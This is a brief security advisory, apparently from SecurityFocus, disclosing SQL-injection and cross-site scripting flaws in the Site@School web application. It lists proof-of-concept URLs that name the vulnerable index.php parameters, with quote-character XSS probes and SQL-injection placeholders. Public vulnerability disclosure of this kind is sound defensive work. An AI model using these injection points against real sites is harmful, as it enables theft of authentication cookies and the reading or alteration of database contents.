source: https://www.securityfocus.com/bid/50195/info
Site@School is prone to multiple SQL-injection and cross-site scripting vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
XSS:
http://www.example.com/school/starnet/index.php?option=stats&suboption='"
http://www.example.com/school/starnet/index.php?option=pagemanager&suboption=newsection&site='"
http://www.example.com/school/starnet/index.php?option=modulemanager&modoption=edit&module_number="
http://www.example.com/school/starnet/index.php?option=modulemanager&module='"
SQL Injection:
http://www.example.com/school/starnet/index.php?option=modulemanager&modoption=edit&module_number=[sql injection]
http://www.example.com/school/starnet/index.php?option=modulemanager&module=[sql injection]